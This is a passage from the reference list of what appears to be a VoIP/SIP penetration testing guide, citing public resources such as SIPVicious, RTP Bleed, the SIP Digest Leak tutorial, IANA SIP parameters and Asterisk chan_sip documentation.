[SIPVicious GitHub repository](https://github.com/EnableSecurity/sipvicious) 703 - [3] [Pepelux's blog](http://blog.pepelux.org/) 704 - [4] [RTP Bleed](https://www.rtpbleed.com/) 705 - [5] [SIP Digest Leak vulnerability](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf) 706 - [6] [Practical VoIP Penetration Testing](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4) 707 - [7] [IANA – Session Initiation Protocol (SIP) Parameters](https://www.iana.org/assignments/sip-parameters/sip-parameters.xhtml) 708 - [8] [Asterisk Documentation – Configuring the deprecated `chan_sip` driver](https://docs.asterisk.org/Configuration/Channel-Drivers/SIP/Configuring-chan_sip/)